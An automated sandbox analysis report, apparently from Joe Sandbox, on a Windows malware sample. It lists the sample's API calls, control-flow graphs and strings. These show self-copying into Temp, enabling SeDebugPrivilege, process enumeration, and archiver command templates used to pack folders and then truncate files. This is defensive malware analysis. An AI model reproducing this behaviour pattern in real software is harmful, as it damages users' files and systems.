                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                          • API String ID: 2042498389-1113178309
                                                                                                                                                                                                                          • Opcode ID: 433a3d03b4f3ac87210dd5a93bcc6b99eb867cbacb3595ba52ad126aba0de6a0
                                                                                                                                                                                                                          • Instruction ID: 462c681ca6899bcf8cbbe150f9966aa22dce097a4f47245102fc589656590d16
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 433a3d03b4f3ac87210dd5a93bcc6b99eb867cbacb3595ba52ad126aba0de6a0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7201BC716423A07AD750ABA6DC5EEAB7E6FEF01B20F104014B6049A2C1DAA09A00C7A0

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 401 6e2845-6e2855 call 6e274a 404 6e2878-6e288a DeleteFileA 401->404 405 6e2857 401->405 407 6e288c-6e2894 VirtualFree 404->407 408 6e289a-6e28a2 404->408 406 6e2865-6e2876 call 6e2692 405->406 406->404 413 6e2859-6e2860 call 6e239d 406->413 407->408 410 6e28ab-6e28b5 408->410 411 6e28a4-6e28a5 CloseHandle 408->411 411->410 413->406
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 006E274A: memset.MSVCRT ref: 006E2766
                                                                                                                                                                                                                            • Part of subcall function 006E274A: memset.MSVCRT ref: 006E2774
                                                                                                                                                                                                                            • Part of subcall function 006E274A: SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 006E2787
                                                                                                                                                                                                                            • Part of subcall function 006E274A: wsprintfA.USER32 ref: 006E27AB
                                                                                                                                                                                                                            • Part of subcall function 006E274A: wsprintfA.USER32 ref: 006E27C6
                                                                                                                                                                                                                            • Part of subcall function 006E274A: CopyFileA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\4e06417b.exe,00000000), ref: 006E27D4
                                                                                                                                                                                                                            • Part of subcall function 006E274A: wsprintfA.USER32 ref: 006E27F4
                                                                                                                                                                                                                            • Part of subcall function 006E274A: DeleteFileA.KERNEL32(?,?,006E4E54,006E4E58), ref: 006E281A
                                                                                                                                                                                                                            • Part of subcall function 006E274A: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,006E4E54,006E4E58), ref: 006E2832
                                                                                                                                                                                                                          • DeleteFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\4e06417b.exe), ref: 006E287D
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 006E2894
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 006E28A5
                                                                                                                                                                                                                            • Part of subcall function 006E2692: CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7622E800,?,?,006E29DB,?,00000001), ref: 006E26A7
                                                                                                                                                                                                                            • Part of subcall function 006E2692: WaitForSingleObject.KERNEL32(00000000,000000FF,7622E800,?,?,006E29DB,?,00000001), ref: 006E26B5
                                                                                                                                                                                                                            • Part of subcall function 006E2692: lstrlen.KERNEL32(?), ref: 006E26C4
                                                                                                                                                                                                                            • Part of subcall function 006E2692: ??2@YAPAXI@Z.MSVCRT ref: 006E26CE
                                                                                                                                                                                                                            • Part of subcall function 006E2692: lstrcpy.KERNEL32(00000004,?), ref: 006E26E3
                                                                                                                                                                                                                            • Part of subcall function 006E2692: SetEvent.KERNEL32 ref: 006E273C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\4e06417b.exe, xrefs: 006E2878
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$wsprintf$CreateDeleteEventmemset$??2@CloseCopyFolderFreeHandleObjectPathSingleSpecialVirtualWaitlstrcpylstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\4e06417b.exe
                                                                                                                                                                                                                          • API String ID: 2533558932-1875479923
                                                                                                                                                                                                                          • Opcode ID: e7bf5ba0018e41b402e06b6c53c2271bae5da4634f7704821c4a989f06cb5c79
                                                                                                                                                                                                                          • Instruction ID: 8bfe537c4bb3ba04651ba8f8f398c5cb15b878688c928b519343d346542267fa
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7bf5ba0018e41b402e06b6c53c2271bae5da4634f7704821c4a989f06cb5c79
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11F0B47024138557D720A776ACEEB9A335F7B10701F000560B606D72D0DFB8D5598A15

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 415 6e14e1-6e14fb 416 6e14fd-6e1510 GetModuleHandleA 415->416 417 6e1541-6e1547 415->417 420 6e151a-6e1535 VirtualQuery 416->420 421 6e1512-6e1518 416->421 418 6e1549-6e154c 417->418 419 6e1573-6e157a call 6e1638 ExitProcess 417->419 424 6e154e-6e1555 418->424 425 6e1569-6e1570 418->425 422 6e153b 420->422 423 6e1537-6e1539 420->423 421->417 422->417 423->417 423->422 424->425 427 6e1557-6e1566 call 6e1af9 424->427 427->425
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 006E1504
                                                                                                                                                                                                                          • VirtualQuery.KERNEL32(006E14E1,?,0000001C), ref: 006E1525
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 006E157A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ExitHandleModuleProcessQueryVirtual
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3946701194-0
                                                                                                                                                                                                                          • Opcode ID: 1280f4f9d0ddf6257519c4b8f03a7aa9521635bcabdc2e97795cb138e62fce17
                                                                                                                                                                                                                          • Instruction ID: 052eb43a426c83961203232d48c998c62e5bc93a4197c9346312b3858a744675
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1280f4f9d0ddf6257519c4b8f03a7aa9521635bcabdc2e97795cb138e62fce17
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC1130B1D02394DFCB21DFB6ACC56BD77BEEB89711B10602AF402DF250D6748941AB51
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 006E60DF
                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 006E6189
                                                                                                                                                                                                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 006E61A5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Virtual$Free$Alloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1852963964-0
                                                                                                                                                                                                                          • Opcode ID: d92d740ba11deb94a2c7500458ce6e319d6ffe51d00f4c7b61ef977ea1037f13
                                                                                                                                                                                                                          • Instruction ID: d771b826bd1c6ce39bb4e3fa559eaae5493c4a3721e71acf9027888b8e129caf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d92d740ba11deb94a2c7500458ce6e319d6ffe51d00f4c7b61ef977ea1037f13
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD118B31601689CFCF318F59CC853DD37A2FF64340F684018EE8A5B381DA716A41CB84
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,?,?,006E13EF), ref: 006E11AB
                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000028,006E13EF,?,?,?,?,?,?,006E13EF), ref: 006E11BB
                                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(006E13EF,00000000,?,00000010,00000000,00000000), ref: 006E11EB
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(006E13EF), ref: 006E11FA
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,006E13EF), ref: 006E1203
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 006E11A5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe
                                                                                                                                                                                                                          • API String ID: 75692138-1113178309
                                                                                                                                                                                                                          • Opcode ID: c3d2136220db48a6a44f653af362de75ebd345279e04ed467ef18053d5ec4dff
                                                                                                                                                                                                                          • Instruction ID: ed32191ead48e66b365414919318aeca91303c81eed0d282959c273ee1ae8944
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3d2136220db48a6a44f653af362de75ebd345279e04ed467ef18053d5ec4dff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 550124B1900348FFDB10DFE4DD89AAEBBBAFB08304F204469E606AA250D7709F449F50
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strstr.MSVCRT ref: 006E23CC
                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006E2464
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 006E2472
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,00000000,00000000), ref: 006E24A8
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006E24B9
                                                                                                                                                                                                                          • strrchr.MSVCRT ref: 006E24C9
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006E24DE
                                                                                                                                                                                                                          • strrchr.MSVCRT ref: 006E24ED
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006E24F2
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006E2505
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006E2524
                                                                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 006E2535
                                                                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 006E255D
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006E256E
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006E2585
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006E25A6
                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 006E25CA
                                                                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 006E25D0
                                                                                                                                                                                                                          • Sleep.KERNEL32(000007D0,?,?), ref: 006E25E5
                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006E25FC
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 006E2611
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 006E2642
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 006E265B
                                                                                                                                                                                                                          • SetEndOfFile.KERNEL32 ref: 006E266D
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 006E2676
                                                                                                                                                                                                                          • RemoveDirectoryA.KERNEL32(?), ref: 006E2681
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                                                                                                                                                                                                          • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\4e06417b.exe
                                                                                                                                                                                                                          • API String ID: 2203340711-1098072299
                                                                                                                                                                                                                          • Opcode ID: 8d14eacc46f31690d06d38e42d60e7183782c6115c238e6ffcb6ad2eaeca2d85
                                                                                                                                                                                                                          • Instruction ID: b2bccdc4ad89657929fc7c8b8f3903b907aaa7ef883b28156a663fd4c2ee5006
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d14eacc46f31690d06d38e42d60e7183782c6115c238e6ffcb6ad2eaeca2d85
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D81CFB1505385BBD710DF62DC89EABB7EFFB88704F00091AF684D7290D7709A498B66
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,006E1400), ref: 006E1226
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 006E122D
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,006E1400), ref: 006E123F
                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,006E1400), ref: 006E1250
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,006E1400), ref: 006E129E
                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,006E1400), ref: 006E12B0
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,006E1400), ref: 006E12F5
                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,006E1400), ref: 006E130A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • ZwQuerySystemInformation, xrefs: 006E1212
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 006E1262
                                                                                                                                                                                                                          • ntdll.dll, xrefs: 006E1219
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe$ZwQuerySystemInformation$ntdll.dll
                                                                                                                                                                                                                          • API String ID: 1500695312-2647507469
                                                                                                                                                                                                                          • Opcode ID: e501f9d7abdd0cd0c6194276a3f0bc0e201d3b53e3d345cbcbb1f35c849f7348
                                                                                                                                                                                                                          • Instruction ID: 77778b2b88127630a156640c594566fc928249432e005b6afcb68a738e71a26c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e501f9d7abdd0cd0c6194276a3f0bc0e201d3b53e3d345cbcbb1f35c849f7348
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D21FC31606391AFD7209B56DC48BAF7A9AFB46B00F100918F645DF380C770DB84D795
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 006E18B1
                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,76230F00,76938400), ref: 006E18D3
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(I%n), ref: 006E18E9
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 006E18F0
                                                                                                                                                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 006E1901
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 006E190A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                                                                                                                                                                                                          • String ID: I%n
                                                                                                                                                                                                                          • API String ID: 876959470-3270767589
                                                                                                                                                                                                                          • Opcode ID: 861147a20537297b13c17c18e3f2a5abab140c8ecad6b68387f59e54b0110f68
                                                                                                                                                                                                                          • Instruction ID: 5337cf751e049fb57fae81e6579d7f7b3685e694cdd71f9436aeba2bc33a54d9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 861147a20537297b13c17c18e3f2a5abab140c8ecad6b68387f59e54b0110f68
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED0175719012687BCB21AB96DC4CDDF7F3EEF45730F104021F915AA150D6714A18CBA0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,7622E800,?,?,006E29DB,?,00000001), ref: 006E26A7
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,7622E800,?,?,006E29DB,?,00000001), ref: 006E26B5
                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 006E26C4
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 006E26CE
                                                                                                                                                                                                                          • lstrcpy.KERNEL32(00000004,?), ref: 006E26E3
                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,00000004), ref: 006E271F
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 006E272D
                                                                                                                                                                                                                          • SetEvent.KERNEL32 ref: 006E273C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 41106472-0
                                                                                                                                                                                                                          • Opcode ID: 578adfbd09c2513c876bf6bd2a0b394c2a2c7ae256d492c1e640f8059652d35e
                                                                                                                                                                                                                          • Instruction ID: d8b035d97d384eec1d1d7c5a79e8b7cc70b770c82b8585328d7b67b6cd1974b2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 578adfbd09c2513c876bf6bd2a0b394c2a2c7ae256d492c1e640f8059652d35e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B119035501391EFCB219F26EC8C8AA7BAFFF847607105019F8548F220DB708D86DB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcatmemcpymemsetrandsrand
                                                                                                                                                                                                                          • String ID: .exe
                                                                                                                                                                                                                          • API String ID: 122620767-4119554291
                                                                                                                                                                                                                          • Opcode ID: 55bdbb74214ef5aec886aa8c33e007da659b7808b5fb8fcb63f74b42d1a18a2a
                                                                                                                                                                                                                          • Instruction ID: 87e4bac3da683fa53cec2a2ba77ec9b909a5e875afe4bd8b4159d364488882d5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55bdbb74214ef5aec886aa8c33e007da659b7808b5fb8fcb63f74b42d1a18a2a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4921BE32E463E06ED3151337ACC4BAD3F079FE3B20F261099F4910F392D5740982A264
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XBVdJN.exe), ref: 006E13BC
                                                                                                                                                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 006E13DA
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 006E1448
                                                                                                                                                                                                                            • Part of subcall function 006E119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\XBVdJN.exe,?,?,?,?,?,?,006E13EF), ref: 006E11AB
                                                                                                                                                                                                                            • Part of subcall function 006E119F: OpenProcessToken.ADVAPI32(00000000,00000028,006E13EF,?,?,?,?,?,?,006E13EF), ref: 006E11BB
                                                                                                                                                                                                                            • Part of subcall function 006E119F: AdjustTokenPrivileges.ADVAPI32(006E13EF,00000000,?,00000010,00000000,00000000), ref: 006E11EB
                                                                                                                                                                                                                            • Part of subcall function 006E119F: CloseHandle.KERNEL32(006E13EF), ref: 006E11FA
                                                                                                                                                                                                                            • Part of subcall function 006E119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,006E13EF), ref: 006E1203
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • SeDebugPrivilege, xrefs: 006E13D3
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\XBVdJN.exe, xrefs: 006E13A8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2702610398.00000000006E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702564539.00000000006E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702631031.00000000006E3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702655526.00000000006E4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000A.00000002.2702680768.00000000006E6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_6e0000_XBVdJN.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\XBVdJN.exe$SeDebugPrivilege
